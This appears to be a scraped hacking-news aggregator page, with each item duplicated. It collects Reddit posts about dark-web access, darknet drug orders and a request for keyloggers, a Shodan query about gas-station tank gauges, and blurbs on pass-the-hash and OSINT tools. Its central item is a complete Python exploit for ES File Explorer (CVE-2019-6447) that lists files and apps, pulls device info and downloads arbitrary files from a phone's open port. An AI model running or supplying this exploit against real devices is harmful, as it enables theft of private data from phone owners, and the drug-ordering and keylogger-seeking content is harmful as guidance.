Deep Web
Hello just need a lil help
I've been using the dark web alot but all of a sudden its telling me to disable javascript and I don't know how to do that on mobile or pc I use darkweb on mobile does anyone know how to do this?
submitted by /u/Beneficial_Loan_1487
[link] [comments]
Hello just need a lil help
I've been using the dark web alot but all of a sudden its telling me to disable javascript and I don't know how to do that on mobile or pc I use darkweb on mobile does anyone know how to do this?
submitted by /u/Beneficial_Loan_1487
[link] [comments]
reddit
r/deepweb - Hello just need a lil help
0 votes and 8 comments so far on Reddit
Deep Web
LOVE LETTER ?? help!
Ok so the thing is that almost one year ago I got caught on the street of my city with MJ and then got a fine that I never paid. In the another hand, I've been ordering from the DM two times for very very very little orders and I've always received them with no problems. Today I received one letter from the goberment of my city to be seizured and I was wondering if I should pick It, ignore It or what... Do you think Love letters come in this way or It should be the fine...? I should check It?? Damn. I was planning on doing another order tomorrow but idk if I should do It or not. Some advice?? Thanks!! (The orders are just little am of Lucy (5tabs) and 1pill of 2C...)
submitted by /u/HumbleProfessional20
[link] [comments]
LOVE LETTER ?? help!
Ok so the thing is that almost one year ago I got caught on the street of my city with MJ and then got a fine that I never paid. In the another hand, I've been ordering from the DM two times for very very very little orders and I've always received them with no problems. Today I received one letter from the goberment of my city to be seizured and I was wondering if I should pick It, ignore It or what... Do you think Love letters come in this way or It should be the fine...? I should check It?? Damn. I was planning on doing another order tomorrow but idk if I should do It or not. Some advice?? Thanks!! (The orders are just little am of Lucy (5tabs) and 1pill of 2C...)
submitted by /u/HumbleProfessional20
[link] [comments]
reddit
r/deepweb - LOVE LETTER ?? help!
0 votes and 3 comments so far on Reddit
hacking: security in practice
Interesting ports and their services
Was looking through Shodan and I found out that gas stations have ATG(automatic tank gauges) and they mostly operate on port 10001. What are some interesting ports and services you've come across?
submitted by /u/Botoxed_Balls
[link] [comments]
Interesting ports and their services
Was looking through Shodan and I found out that gas stations have ATG(automatic tank gauges) and they mostly operate on port 10001. What are some interesting ports and services you've come across?
submitted by /u/Botoxed_Balls
[link] [comments]
reddit
Interesting ports and their services
Was looking through Shodan and I found out that gas stations have ATG(automatic tank gauges) and they mostly operate on port 10001. What are some...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Text string that crashes text editors
I've seen in some youtube videos of people doing malware analysis that some hackers put at the end of their source code a string of characters that is not interpretable by text editors, and the only way to get the content of the file is to remove from the terminal the last line of the file and then open it.
Could someone tell me where to find this string and explain me why this happens? (I suppose it's because the characters inside are not interpretable, but it seems quite strange since it reminds me the iphone bug)
submitted by /u/Jefry99
[link] [comments]
Text string that crashes text editors
I've seen in some youtube videos of people doing malware analysis that some hackers put at the end of their source code a string of characters that is not interpretable by text editors, and the only way to get the content of the file is to remove from the terminal the last line of the file and then open it.
Could someone tell me where to find this string and explain me why this happens? (I suppose it's because the characters inside are not interpretable, but it seems quite strange since it reminds me the iphone bug)
submitted by /u/Jefry99
[link] [comments]
reddit
r/hacking - Text string that crashes text editors
0 votes and 0 comments so far on Reddit
hacking: security in practice
What keyloggers do you use?
anything with good reputation?
submitted by /u/alex11263jesus
[link] [comments]
What keyloggers do you use?
anything with good reputation?
submitted by /u/alex11263jesus
[link] [comments]
reddit
r/hacking - What keyloggers do you use?
0 votes and 1 comment so far on Reddit
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ES File Explorer 4.1.9.7.4 Arbitrary File Read
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
ES File Explorer version 4.1.9.7.4 arbitrary file read exploit.
MD5 |
Download
Source:packetstormsecurity.com
ES File Explorer 4.1.9.7.4 Arbitrary File Read
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
ES File Explorer version 4.1.9.7.4 arbitrary file read exploit.
MD5 |
3c25d5c9cc6d583b07aa0211035656b6Download
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <ip[file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" listAudios : List all audios.")
print(" listApps : List Applications installed.")
print(" listAppsSystem : List System apps.")
print(" listAppsPhone : List Communication related apps.")
print(" listAppsSdcard : List apps on the SDCard.")
print(" listAppsAll : List all Application.")
print(" getFile : Download a file.")
print(" getDeviceInfo : Get device info.")
sys.exit(1)
print("\n==================================================================")
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")
header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
def httpPost(cmd):
data = json.dumps({"command":cmd})
response = requests.post(url, headers=header, data=data)
return ast.literal_eval(response.text)
def parse(text, keys):
for dic in text:
for key in keys:
print(f"{key} : {dic[key]}")
print('')
def do_listing(cmd):
response = httpPost(cmd)
if len(response) == 0:
keys = []
else:
keys = list(response[0].keys())
parse(response, keys)
if cmd in listCmds:
do_listing(cmd)
elif cmd == cmds[9]:
if len(sys.argv) != 4:
print("[+] Include file name to download.")
sys.exit(1)
elif sys.argv[3][0] != '/':
print("[-] You need to provide full path of the file.")
sys.exit(1)
else:
path = sys.argv[3]
print("[+] Downloading file...")
response = requests.get(url + path)
with open('out.dat','wb') as wf:
wf.write(response.content)
print("[+] Done. Saved as `out.dat`.")
elif cmd == cmds[10]:
response = httpPost(cmd)
keys = list(response.keys())
for key in keys:
print(f"{key} : {response[key]}")
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Survey Data Reveals Gap in Americans' Security Awareness
Survey data reveals many people have never heard of major cyberattacks, including the attack targeting Colonial Pipeline.
Survey Data Reveals Gap in Americans' Security Awareness
Survey data reveals many people have never heard of major cyberattacks, including the attack targeting Colonial Pipeline.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation
NamedPipePTH project is a PoC code to use Pass-the-Hash for authentication on a local Named Pipe user Impersonation. There also is a blog post for explanation: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/ It is heavily based on the code from the projects Invoke-SMBExec.ps1 and RoguePotato. I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low […]
The post NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation appeared first on Kali Linux Tutorials.
NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation
NamedPipePTH project is a PoC code to use Pass-the-Hash for authentication on a local Named Pipe user Impersonation. There also is a blog post for explanation: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/ It is heavily based on the code from the projects Invoke-SMBExec.ps1 and RoguePotato. I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low […]
The post NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Gather information and exploit the network with Dracnmap
https://cdn-images-1.medium.com/max/771/1*RvUNVXB7sUQjuzjyQ78ewA.png
Dracnmap is an open-source program that is utilizing to misuse the system and gathering data with Nmap help. Nmap command accompanies…
Continue reading on Purple TEAM »
Gather information and exploit the network with Dracnmap
https://cdn-images-1.medium.com/max/771/1*RvUNVXB7sUQjuzjyQ78ewA.png
Dracnmap is an open-source program that is utilizing to misuse the system and gathering data with Nmap help. Nmap command accompanies…
Continue reading on Purple TEAM »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Comprehensive OSINT framework — ReconSpider
https://cdn-images-1.medium.com/max/746/1*1VLlsZEgynnQM-XaV2VXOA.png
ReconSpider is a capable tool to perform Open Source Intelligence scans on email, domain, ip_address, and organization. ReconSpider…
Continue reading on Purple TEAM »
Comprehensive OSINT framework — ReconSpider
https://cdn-images-1.medium.com/max/746/1*1VLlsZEgynnQM-XaV2VXOA.png
ReconSpider is a capable tool to perform Open Source Intelligence scans on email, domain, ip_address, and organization. ReconSpider…
Continue reading on Purple TEAM »